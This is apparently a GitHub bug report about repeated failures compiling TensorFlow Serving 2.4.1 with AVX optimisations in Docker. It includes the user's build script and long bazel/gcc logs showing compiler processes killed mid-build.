bazel-out/k8-opt/bin/external/com_google_absl -iquote external/nsync -iquote bazel-out/k8-opt/bin/external/nsync -iquote external/eigen_archive -iquote bazel-out/k8-opt/bin/external/eigen_archive -iquote external/gif -iquote bazel-out/k8-opt/bin/external/gif -iquote external/libjpeg_turbo -iquote bazel-out/k8-opt/bin/external/libjpeg_turbo -iquote external/com_google_protobuf -iquote bazel-out/k8-opt/bin/external/com_google_protobuf -iquote external/zlib -iquote bazel-out/k8-opt/bin/external/zlib -iquote external/com_googlesource_code_re2 -iquote bazel-out/k8-opt/bin/external/com_googlesource_code_re2 -iquote external/farmhash_archive -iquote bazel-out/k8-opt/bin/external/farmhash_archive -iquote external/fft2d -iquote bazel-out/k8-opt/bin/external/fft2d -iquote external/highwayhash -iquote bazel-out/k8-opt/bin/external/highwayhash -iquote external/double_conversion -iquote bazel-out/k8-opt/bin/external/double_conversion -iquote external/snappy -iquote bazel-out/k8-opt/bin/external/snappy -iquote external/curl -iquote bazel-out/k8-opt/bin/external/curl -iquote external/boringssl -iquote bazel-out/k8-opt/bin/external/boringssl -iquote external/jsoncpp_git -iquote bazel-out/k8-opt/bin/external/jsoncpp_git -iquote external/aws -iquote bazel-out/k8-opt/bin/external/aws -iquote external/aws-c-common -iquote bazel-out/k8-opt/bin/external/aws-c-common -iquote external/aws-c-event-stream -iquote bazel-out/k8-opt/bin/external/aws-c-event-stream -iquote external/aws-checksums -iquote bazel-out/k8-opt/bin/external/aws-checksums -isystem external/nsync/public -isystem bazel-out/k8-opt/bin/external/nsync/public -isystem external/eigen_archive -isystem bazel-out/k8-opt/bin/external/eigen_archive -isystem external/gif -isystem bazel-out/k8-opt/bin/external/gif -isystem external/com_google_protobuf/src -isystem bazel-out/k8-opt/bin/external/com_google_protobuf/src -isystem external/zlib -isystem bazel-out/k8-opt/bin/external/zlib -isystem external/farmhash_archive/src -isystem bazel-out/k8-opt/bin/external/farmhash_archive/src -isystem external/double_conversion -isystem bazel-out/k8-opt/bin/external/double_conversion -isystem external/curl/include -isystem bazel-out/k8-opt/bin/external/curl/include -isystem external/boringssl/src/include -isystem bazel-out/k8-opt/bin/external/boringssl/src/include -isystem external/jsoncpp_git/include -isystem bazel-out/k8-opt/bin/external/jsoncpp_git/include -isystem external/aws/aws-cpp-sdk-core/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-core/include -isystem external/aws/aws-cpp-sdk-s3/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-s3/include -isystem external/aws/aws-cpp-sdk-transfer/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-transfer/include -isystem external/aws-c-common/include -isystem bazel-out/k8-opt/bin/external/aws-c-common/include -isystem external/aws-c-event-stream/include -isystem bazel-out/k8-opt/bin/external/aws-c-event-stream/include -isystem external/aws-checksums/include -isystem bazel-out/k8-opt/bin/external/aws-checksums/include -mavx '-std=c++14' '-D_GLIBCXX_USE_CXX11_ABI=0' -DEIGEN_AVOID_STL_ARRAY -Iexternal/gemmlowp -Wno-sign-compare '-ftemplate-depth=900' -fno-exceptions -msse3 -DTENSORFLOW_MONOLITHIC_BUILD -pthread -fno-canonical-system-headers -Wno-builtin-macro-redefined '-D__DATE__="redacted"' '-D__TIMESTAMP__="redacted"' '-D__TIME__="redacted"' -c external/org_tensorflow/tensorflow/core/kernels/linalg/matrix_square_root_op.cc -o bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/linalg/_objs/matrix_square_root_op/matrix_square_root_op.o) #16 4542.9 Execution platform: @local_execution_config_platform//:platform In file included from external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/FixedPoint:46:0, #16 4542.9 from external/org_tensorflow/tensorflow/core/framework/types.h:27, #16 4542.9 from external/org_tensorflow/tensorflow/core/framework/kernel_def_builder.h:19, #16 4542.9 from external/org_tensorflow/tensorflow/core/kernels/linalg/matrix_square_root_op.cc:20: #16 4542.9 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:14:41: warning: ignoring attributes on template argument '__m256i {aka __vector(4) long long int}' [-Wignored-attributes] #16 4542.9 typedef eigen_packet_wrapper<__m256i, 10> Packet32q8i; #16 4542.9 ^ #16 4542.9 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:15:41: warning: ignoring attributes on template argument '__m128i {aka __vector(2) long long int}' [-Wignored-attributes] #16 4542.9 typedef eigen_packet_wrapper<__m128i, 11> Packet16q8i; #16 4542.9 ^ #16 4542.9 In file included from external/org_tensorflow/tensorflow/core/framework/op_kernel.h:49:0, #16 4542.9 from external/org_tensorflow/tensorflow/core/kernels/linalg/matrix_square_root_op.cc:21: #16 4542.9 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::StartTransaction(const string&, tensorflow::TransactionToken**)': #16 4542.9 external/org_tensorflow/tensorflow/core/platform/env.h:350:46: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 4542.9 TransactionToken** token) { #16 4542.9 ^~~~~ #16 4542.9 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::GetTransactionForPath(const string&, tensorflow::TransactionToken**)': #16 4542.9 external/org_tensorflow/tensorflow/core/platform/env.h:371:51: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 4542.9 TransactionToken** token) { #16 4542.9 ^~~~~ #16 4542.9 gcc: internal compiler error: Killed (program cc1plus) #16 4542.9 Please submit a full bug report, #16 4542.9 with preprocessed source if appropriate. #16 4542.9 See <file:///usr/share/doc/gcc-7/README.Bugs> for instructions. ERROR: /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/external/org_tensorflow/tensorflow/core/kernels/BUILD:3991:1: Couldn't build file external/org_tensorflow/tensorflow/core/kernels/_objs/bias_op/bias_op.o: C++ compilation of rule '@org_tensorflow//tensorflow/core/kernels:bias_op' failed (Exit 4): gcc failed: error executing command #16 4887.7 (cd /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/execroot/tf_serving && \ #16 4887.7 exec env - \ #16 4887.7 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin \ #16 4887.7 PWD=/proc/self/cwd \ #16 4887.7 PYTHON_BIN_PATH=/usr/bin/python3 \ #16 4887.7 /usr/bin/gcc -U_FORTIFY_SOURCE -fstack-protector -Wall -Wunused-but-set-parameter -Wno-free-nonheap-object -fno-omit-frame-pointer -g0 -O2 '-D_FORTIFY_SOURCE=1' -DNDEBUG -ffunction-sections -fdata-sections '-std=c++0x' -MD -MF bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/bias_op/bias_op.d '-frandom-seed=bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/bias_op/bias_op.o' -DCURL_STATICLIB -DPLATFORM_LINUX -DENABLE_CURL_CLIENT -DOPENSSL_IS_BORINGSSL -DTENSORFLOW_USE_CUSTOM_CONTRACTION_KERNEL -DTENSORFLOW_USE_MKLDNN_CONTRACTION_KERNEL -DHAVE_SYS_UIO_H -DTF_USE_SNAPPY -D__CLANG_SUPPORT_DYN_ANNOTATION__ -DEIGEN_MPL2_ONLY '-DEIGEN_MAX_ALIGN_BYTES=64' '-DEIGEN_HAS_TYPE_TRAITS=0' -iquote external/org_tensorflow -iquote bazel-out/k8-opt/bin/external/org_tensorflow -iquote external/com_google_absl -iquote bazel-out/k8-opt/bin/external/com_google_absl -iquote external/eigen_archive -iquote bazel-out/k8-opt/bin/external/eigen_archive -iquote external/mkl_dnn -iquote bazel-out/k8-opt/bin/external/mkl_dnn -iquote external/nsync -iquote bazel-out/k8-opt/bin/external/nsync -iquote external/gif -iquote bazel-out/k8-opt/bin/external/gif -iquote external/libjpeg_turbo -iquote bazel-out/k8-opt/bin/external/libjpeg_turbo -iquote external/com_google_protobuf -iquote bazel-out/k8-opt/bin/external/com_google_protobuf -iquote external/zlib -iquote bazel-out/k8-opt/bin/external/zlib -iquote external/com_googlesource_code_re2 -iquote bazel-out/k8-opt/bin/external/com_googlesource_code_re2 -iquote external/farmhash_archive -iquote bazel-out/k8-opt/bin/external/farmhash_archive -iquote external/fft2d -iquote bazel-out/k8-opt/bin/external/fft2d -iquote external/highwayhash -iquote bazel-out/k8-opt/bin/external/highwayhash -iquote external/double_conversion -iquote bazel-out/k8-opt/bin/external/double_conversion -iquote external/snappy -iquote bazel-out/k8-opt/bin/external/snappy -iquote external/curl -iquote bazel-out/k8-opt/bin/external/curl -iquote external/boringssl -iquote bazel-out/k8-opt/bin/external/boringssl -iquote external/jsoncpp_git -iquote bazel-out/k8-opt/bin/external/jsoncpp_git -iquote external/aws -iquote bazel-out/k8-opt/bin/external/aws -iquote external/aws-c-common -iquote bazel-out/k8-opt/bin/external/aws-c-common -iquote external/aws-c-event-stream -iquote bazel-out/k8-opt/bin/external/aws-c-event-stream -iquote external/aws-checksums -iquote bazel-out/k8-opt/bin/external/aws-checksums -isystem external/eigen_archive -isystem bazel-out/k8-opt/bin/external/eigen_archive -isystem external/mkl_dnn/include -isystem bazel-out/k8-opt/bin/external/mkl_dnn/include -isystem external/mkl_dnn/src -isystem bazel-out/k8-opt/bin/external/mkl_dnn/src -isystem external/mkl_dnn/src/common -isystem bazel-out/k8-opt/bin/external/mkl_dnn/src/common -isystem external/mkl_dnn/src/cpu -isystem bazel-out/k8-opt/bin/external/mkl_dnn/src/cpu -isystem external/mkl_dnn/src/cpu/gemm -isystem bazel-out/k8-opt/bin/external/mkl_dnn/src/cpu/gemm -isystem external/mkl_dnn/src/cpu/xbyak -isystem bazel-out/k8-opt/bin/external/mkl_dnn/src/cpu/xbyak -isystem external/nsync/public -isystem bazel-out/k8-opt/bin/external/nsync/public -isystem external/gif -isystem bazel-out/k8-opt/bin/external/gif -isystem external/com_google_protobuf/src -isystem bazel-out/k8-opt/bin/external/com_google_protobuf/src -isystem external/zlib -isystem bazel-out/k8-opt/bin/external/zlib -isystem external/farmhash_archive/src -isystem bazel-out/k8-opt/bin/external/farmhash_archive/src -isystem external/double_conversion -isystem bazel-out/k8-opt/bin/external/double_conversion -isystem external/curl/include -isystem bazel-out/k8-opt/bin/external/curl/include -isystem external/boringssl/src/include -isystem bazel-out/k8-opt/bin/external/boringssl/src/include -isystem external/jsoncpp_git/include -isystem bazel-out/k8-opt/bin/external/jsoncpp_git/include -isystem external/aws/aws-cpp-sdk-core/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-core/include -isystem external/aws/aws-cpp-sdk-s3/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-s3/include -isystem external/aws/aws-cpp-sdk-transfer/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-transfer/include -isystem external/aws-c-common/include -isystem bazel-out/k8-opt/bin/external/aws-c-common/include -isystem external/aws-c-event-stream/include -isystem bazel-out/k8-opt/bin/external/aws-c-event-stream/include -isystem external/aws-checksums/include -isystem bazel-out/k8-opt/bin/external/aws-checksums/include -mavx '-std=c++14' '-D_GLIBCXX_USE_CXX11_ABI=0' -DEIGEN_AVOID_STL_ARRAY -Iexternal/gemmlowp -Wno-sign-compare '-ftemplate-depth=900' -fno-exceptions -msse3 -DTENSORFLOW_MONOLITHIC_BUILD -pthread -fno-canonical-system-headers -Wno-builtin-macro-redefined '-D__DATE__="redacted"' '-D__TIMESTAMP__="redacted"' '-D__TIME__="redacted"' -c external/org_tensorflow/tensorflow/core/kernels/bias_op.cc -o bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/bias_op/bias_op.o) #16 4887.7 Execution platform: @local_execution_config_platform//:platform In file included from external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/FixedPoint:46:0, #16 4887.7 from external/org_tensorflow/tensorflow/core/framework/types.h:27, #16 4887.7 from external/org_tensorflow/tensorflow/core/framework/numeric_op_base.h:20, #16 4887.7 from external/org_tensorflow/tensorflow/core/framework/numeric_op.h:18, #16 4887.7 from external/org_tensorflow/tensorflow/core/kernels/bias_op.cc:23: #16 4887.7 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:14:41: warning: ignoring attributes on template argument '__m256i {aka __vector(4) long long int}' [-Wignored-attributes] #16 4887.7 typedef eigen_packet_wrapper<__m256i, 10> Packet32q8i; #16 4887.7 ^ #16 4887.7 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:15:41: warning: ignoring attributes on template argument '__m128i {aka __vector(2) long long int}' [-Wignored-attributes] #16 4887.7 typedef eigen_packet_wrapper<__m128i, 11> Packet16q8i; #16 4887.7 ^ #16 4887.7 In file included from external/org_tensorflow/tensorflow/core/framework/op_kernel.h:49:0, #16 4887.7 from external/org_tensorflow/tensorflow/core/framework/numeric_op.h:19, #16 4887.7 from external/org_tensorflow/tensorflow/core/kernels/bias_op.cc:23: #16 4887.7 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::StartTransaction(const string&, tensorflow::TransactionToken**)': #16 4887.7 external/org_tensorflow/tensorflow/core/platform/env.h:350:46: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 4887.7 TransactionToken** token) { #16 4887.7 ^~~~~ #16 4887.7 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::GetTransactionForPath(const string&, tensorflow::TransactionToken**)': #16 4887.7 external/org_tensorflow/tensorflow/core/platform/env.h:371:51: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 4887.7 TransactionToken** token) { #16 4887.7 ^~~~~ #16 4887.7 gcc: internal compiler error: Killed (program cc1plus) #16 4887.7 Please submit a full bug report, #16 4887.7 with preprocessed source if appropriate. #16 4887.7 See <file:///usr/share/doc/gcc-7/README.Bugs> for instructions. Target //tensorflow_serving/model_servers:tensorflow_model_server failed to build INFO: Elapsed time: 9471.143s, Critical Path: 280.07s INFO: 6629 processes: 6629 local. FAILED: Build did NOT complete successfully #16 9472.1 ------37.8 Dockerfile.devel:104 -------------------- 103 | 104 | >>> RUN bazel build --color=yes --curses=yes \ 105 | >>> ${TF_SERVING_BAZEL_OPTIONS} \ 106 | >>> --verbose_failures \ 107 | >>> --output_filter=DONT_MATCH_ANYTHING \ 108 | >>> ${TF_SERVING_BUILD_OPTIONS} \ 109 | >>> tensorflow_serving/model_servers:tensorflow_model_server && \ 110 | >>> cp bazel-bin/tensorflow_serving/model_servers/tensorflow_model_server \ 111 | >>> /usr/local/bin/ 112 | -------------------- error: failed to solve: rpc error: code = Unknown desc = executor failed running [/bin/sh -c bazel build --color=yes --curses=yes ${TF_SERVING_BAZEL_OPTIONS} --verbose_failures --output_filter=DONT_MATCH_ANYTHING ${TF_SERVING_BUILD_OPTIONS} tensorflow_serving/model_servers:tensorflow_model_server && cp bazel-bin/tensorflow_serving/model_servers/tensorflow_model_server /usr/local/bin/]: exit code: 1 WARN[0000] No output specified for docker-container driver. Build result will only remain in the build cache. To push result image into registry use --push or to load image into docker use --load #1 [internal] load build definition from Dockerfile #1 sha256:7b7f2648c1157fec740c05f9d315bb91e3ddb0acba9635f04ba97c2487952ea6 #1 transferring dockerfile: 2.06kB 0.0s done #1 DONE 0.1s #2 [internal] load .dockerignore #2 sha256:f7e85ba477cfcd7e3ca106d82fad92f828c0c7eecdb7b4d8e66fac5ea2b9b053 #2 transferring context: 2B 0.0s done #2 DONE 0.0s #4 [internal] load metadata for docker.io/library/ubuntu:18.04 #4 sha256:ae46bbb1b755529d0da663ca0256a22acd7c9fe21844946c149800baa67c4e4b #4 ... #5 [auth] library/ubuntu:pull token for registry-1.docker.io #5 sha256:dc2259b96c63cdf9ac92987eaeb8defb94d706e86e9f543ee2e945a669e202da #5 DONE 0.0s #3 [internal] load metadata for docker.io/rogeryuchao/tensorflow-serving-devel:1.0.0 #3 sha256:a4ac02309c14eaa78eef558007485c97914b03ee24d1af3338c524cec6d83f7a #3 ... #6 [auth] rogeryuchao/tensorflow-serving-devel:pull token for registry-1.docker.io #6 sha256:86c38852e2b6b06b3a09d737b0aadfc525290359e8167825852db99c65646684 #6 DONE 0.0s #3 [internal] load metadata for docker.io/rogeryuchao/tensorflow-serving-devel:1.0.0 #3 sha256:a4ac02309c14eaa78eef558007485c97914b03ee24d1af3338c524cec6d83f7a #3 ... #4 [internal] load metadata for docker.io/library/ubuntu:18.04 #4 sha256:ae46bbb1b755529d0da663ca0256a22acd7c9fe21844946c149800baa67c4e4b #4 DONE 2.7s #3 [internal] load metadata for docker.io/rogeryuchao/tensorflow-serving-devel:1.0.0 #3 sha256:a4ac02309c14eaa78eef558007485c97914b03ee24d1af3338c524cec6d83f7a #3 ERROR: docker.io/rogeryuchao/tensorflow-serving-devel:1.0.0: not found ------ > [internal] load metadata for docker.io/rogeryuchao/tensorflow-serving-devel:1.0.0: ------ error: failed to solve: rpc error: code = Unknown desc = failed to solve with frontend dockerfile.v0: failed to create LLB definition: docker.io/rogeryuchao/tensorflow-serving-devel:1.0.0: not found ```
1.0
TFX CPU Optimization Compiling in Docker Multiple Compile Steps Failure - ## Bug Report ### System information - **OS Platform and Distribution (e.g., Linux Ubuntu 16.04)**: MAC OS BigSir 11.2.3 - **TensorFlow Serving installed from (source or binary)**: Source - **TensorFlow Serving version**: 2.4.1 ### Describe the problem I need to compile an CPU optimized version for tensorflow serving. Operations is based on the document page https://www.tensorflow.org/tfx/serving/building_with_docker And I fail to bazel build the docker tfx in the docker for 4 times which are consistently have the same problem. Also the total compiling time is longer than 3hours, it is normal? ### Exact Steps to Reproduce Here is the shell file to do run the building:**tfx_cpu_compile.sh** ``` #!/bin/bash USER=$1 TAG=$2 TF_SERVING_VERSION_GIT_BRANCH="2.4.1" git clone --branch="${TF_SERVING_VERSION_GIT_BRANCH}" https://github.com/tensorflow/serving TF_SERVING_BUILD_OPTIONS="--copt=-mavx --local_ram_resources=4096" cd serving && \ docker buildx build --pull -t $USER/tensorflow-serving-devel:$TAG \ --build-arg TF_SERVING_VERSION_GIT_BRANCH="${TF_SERVING_VERSION_GIT_BRANCH}" \ --build-arg TF_SERVING_BUILD_OPTIONS="${TF_SERVING_BUILD_OPTIONS}" \ -f tensorflow_serving/tools/docker/Dockerfile.devel . ``` Here is the command for running the shell file ` ./tfx_cpu_compile.sh rogeryuchao 1.0.0` ### Source code / logs There are bunch of ERROR message, and I'm not quite sure which one is the contributor to this failure building. ``` WARN[0000] No output specified for docker-container driver. Build result will only remain in the build cache. To push result image into registry use --push or to load image into docker use --load [+] Building 9484.7s (16/18) => [internal] load build definition from Dockerfile.devel 0.0s => => transferring dockerfile: 4.77kB 0.0s => [internal] load .dockerignore 0.0s => => transferring context: 2B 0.0s => [internal] load metadata for docker.io/library/ubuntu:18.04 3.5s => [auth] library/ubuntu:pull token for registry-1.docker.io 0.0s => [base_build 1/10] FROM docker.io/library/ubuntu:18.04@sha256:538529c9d229fb55f50e6746b119e899775205d62c0fc1b7e679b30d02ecb6e8 0.0s => => resolve docker.io/library/ubuntu:18.04@sha256:538529c9d229fb55f50e6746b119e899775205d62c0fc1b7e679b30d02ecb6e8 0.0s => CACHED [base_build 2/10] RUN apt-get update && apt-get install -y --no-install-recommends automake build-essential ca 0.0s => CACHED [base_build 3/10] RUN curl -fSsL -O https://bootstrap.pypa.io/get-pip.py && python3 get-pip.py && rm get-pip.py 0.0s => CACHED [base_build 4/10] RUN add-apt-repository ppa:deadsnakes/ppa && apt-get update && apt-get install -y python3.6 python3.6-dev py 0.0s => CACHED [base_build 5/10] RUN update-alternatives --install /usr/bin/python python /usr/bin/python3.6 0 0.0s => CACHED [base_build 6/10] RUN pip3 --no-cache-dir install future>=0.17.1 grpcio h5py keras_applications>=1.0.8 keras_prepr 0.0s => CACHED [base_build 7/10] RUN mkdir /bazel && cd /bazel && curl -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KH 0.0s => CACHED [base_build 8/10] WORKDIR /tensorflow-serving 0.0s => CACHED [base_build 9/10] RUN git clone --branch=2.4.1 https://github.com/tensorflow/serving . && git remote add upstream https://github.c 0.0s => CACHED [binary_build 1/4] RUN echo "Building with build options: --copt=-mavx --local_ram_resources=4096" 0.0s => CACHED [binary_build 2/4] RUN echo "Building with Bazel options: " 0.0s => ERROR [binary_build 3/4] RUN bazel build --color=yes --curses=yes --verbose_failures --output_filter=DONT_MATCH_ANYTHING - 9481.0s ------ > [binary_build 3/4] RUN bazel build --color=yes --curses=yes --verbose_failures --output_filter=DONT_MATCH_ANYTHING --copt=-mavx --local_ram_resources=4096 tensorflow_serving/model_servers:tensorflow_model_server && cp bazel-bin/tensorflow_serving/model_servers/tensorflow_model_server /usr/local/bin/: #16 0.250 Extracting Bazel installation... #16 2.324 Starting local Bazel server and connecting to it... WARNING: Download from https://mirror.bazel.build/github.com/tensorflow/tensorflow/archive/85c8b2a817f95a3e979ecd1ed95bff1dc1335cff.tar.gz failed: class com.google.devtools.build.lib.bazel.repository.downloader.UnrecoverableHttpException GET returned 404 Not Found DEBUG: Rule 'io_bazel_rules_docker' indicated that a canonical reproducible form can be obtained by modifying arguments shallow_since = "1556410077 -0400" DEBUG: Call stack for the definition of repository 'io_bazel_rules_docker' which is a git_repository (rule definition at /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/external/bazel_tools/tools/build_defs/repo/git.bzl:195:18): #16 35.42 - <builtin> #16 35.42 - /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/external/bazel_toolchains/repositories/repositories.bzl:37:9 #16 35.42 - /tensorflow-serving/WORKSPACE:42:1 WARNING: Download from https://mirror.bazel.build/github.com/aws/aws-sdk-cpp/archive/1.7.336.tar.gz failed: class com.google.devtools.build.lib.bazel.repository.downloader.UnrecoverableHttpException GET returned 404 Not Found WARNING: Download from https://storage.googleapis.com/mirror.tensorflow.org/github.com/llvm/llvm-project/archive/f402e682d0ef5598eeffc9a21a691b03e602ff58.tar.gz failed: class com.google.devtools.build.lib.bazel.repository.downloader.UnrecoverableHttpException GET returned 404 Not Found INFO: Analyzed target //tensorflow_serving/model_servers:tensorflow_model_server (254 packages loaded, 18977 targets configured). INFO: Found 1 target... ERROR: /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/BUILD:382:5: Couldn't build file external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/_objs/tensorflow_ops_n_z/tf_ops_n_z.o: C++ compilation of rule '@org_tensorflow//tensorflow/compiler/mlir/tensorflow:tensorflow_ops_n_z' failed (Exit 4): gcc failed: error executing command #16 3126.6 (cd /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/execroot/tf_serving && \ #16 3126.6 exec env - \ #16 3126.6 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin \ #16 3126.6 PWD=/proc/self/cwd \ #16 3126.6 PYTHON_BIN_PATH=/usr/bin/python3 \ #16 3126.6 /usr/bin/gcc -U_FORTIFY_SOURCE -fstack-protector -Wall -Wunused-but-set-parameter -Wno-free-nonheap-object -fno-omit-frame-pointer -g0 -O2 '-D_FORTIFY_SOURCE=1' -DNDEBUG -ffunction-sections -fdata-sections '-std=c++0x' -MD -MF bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/_objs/tensorflow_ops_n_z/tf_ops_n_z.d '-frandom-seed=bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/_objs/tensorflow_ops_n_z/tf_ops_n_z.o' -DLLVM_ENABLE_STATS -D__STDC_LIMIT_MACROS -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -DLLVM_BUILD_GLOBAL_ISEL -DTF_USE_SNAPPY -DEIGEN_MPL2_ONLY '-DEIGEN_MAX_ALIGN_BYTES=64' '-DEIGEN_HAS_TYPE_TRAITS=0' -DHAVE_SYS_UIO_H -D__CLANG_SUPPORT_DYN_ANNOTATION__ -iquote external/org_tensorflow -iquote bazel-out/k8-opt/bin/external/org_tensorflow -iquote external/llvm-project -iquote bazel-out/k8-opt/bin/external/llvm-project -iquote external/zlib -iquote bazel-out/k8-opt/bin/external/zlib -iquote external/com_google_absl -iquote bazel-out/k8-opt/bin/external/com_google_absl -iquote external/nsync -iquote bazel-out/k8-opt/bin/external/nsync -iquote external/eigen_archive -iquote bazel-out/k8-opt/bin/external/eigen_archive -iquote external/gif -iquote bazel-out/k8-opt/bin/external/gif -iquote external/libjpeg_turbo -iquote bazel-out/k8-opt/bin/external/libjpeg_turbo -iquote external/com_google_protobuf -iquote bazel-out/k8-opt/bin/external/com_google_protobuf -iquote external/com_googlesource_code_re2 -iquote bazel-out/k8-opt/bin/external/com_googlesource_code_re2 -iquote external/farmhash_archive -iquote bazel-out/k8-opt/bin/external/farmhash_archive -iquote external/fft2d -iquote bazel-out/k8-opt/bin/external/fft2d -iquote external/highwayhash -iquote bazel-out/k8-opt/bin/external/highwayhash -iquote external/double_conversion -iquote bazel-out/k8-opt/bin/external/double_conversion -iquote external/snappy -iquote bazel-out/k8-opt/bin/external/snappy -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/CallOpInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/InferTypeOpInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/OpAsmInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/RegionKindInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/SideEffectInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/SymbolInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/DerivedAttributeOpInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/LoopLikeInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/ParserTokenKinds -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/ControlFlowInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/StandardOpsIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/VectorInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/ViewLikeInterfaceIncGen -isystem external/llvm-project/mlir/include -isystem bazel-out/k8-opt/bin/external/llvm-project/mlir/include -isystem external/llvm-project/llvm/include -isystem bazel-out/k8-opt/bin/external/llvm-project/llvm/include -isystem external/zlib -isystem bazel-out/k8-opt/bin/external/zlib -isystem external/nsync/public -isystem bazel-out/k8-opt/bin/external/nsync/public -isystem external/eigen_archive -isystem bazel-out/k8-opt/bin/external/eigen_archive -isystem external/gif -isystem bazel-out/k8-opt/bin/external/gif -isystem external/com_google_protobuf/src -isystem bazel-out/k8-opt/bin/external/com_google_protobuf/src -isystem external/farmhash_archive/src -isystem bazel-out/k8-opt/bin/external/farmhash_archive/src -isystem external/double_conversion -isystem bazel-out/k8-opt/bin/external/double_conversion -mavx '-std=c++14' '-D_GLIBCXX_USE_CXX11_ABI=0' -fno-canonical-system-headers -Wno-builtin-macro-redefined '-D__DATE__="redacted"' '-D__TIMESTAMP__="redacted"' '-D__TIME__="redacted"' -c external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc -o bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/_objs/tensorflow_ops_n_z/tf_ops_n_z.o) #16 3126.6 Execution platform: @local_execution_config_platform//:platform In file included from external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/FixedPoint:46:0, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/numeric_types.h:24, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/allocator.h:26, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/tensor.h:23, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/attr_value_util.h:24, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/node_def_util.h:23, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/shape_inference.h:21, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/common_shape_fns.h:20, #16 3126.6 from external/org_tensorflow/tensorflow/core/framework/resource_mgr.h:25, #16 3126.6 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_op_interfaces.h:29, #16 3126.6 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.h:35, #16 3126.6 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:16: #16 3126.6 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:14:41: warning: ignoring attributes on template argument '__m256i {aka __vector(4) long long int}' [-Wignored-attributes] #16 3126.6 typedef eigen_packet_wrapper<__m256i, 10> Packet32q8i; #16 3126.6 ^ #16 3126.6 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:15:41: warning: ignoring attributes on template argument '__m128i {aka __vector(2) long long int}' [-Wignored-attributes] #16 3126.6 typedef eigen_packet_wrapper<__m128i, 11> Packet16q8i; #16 3126.6 ^ #16 3126.6 In file included from 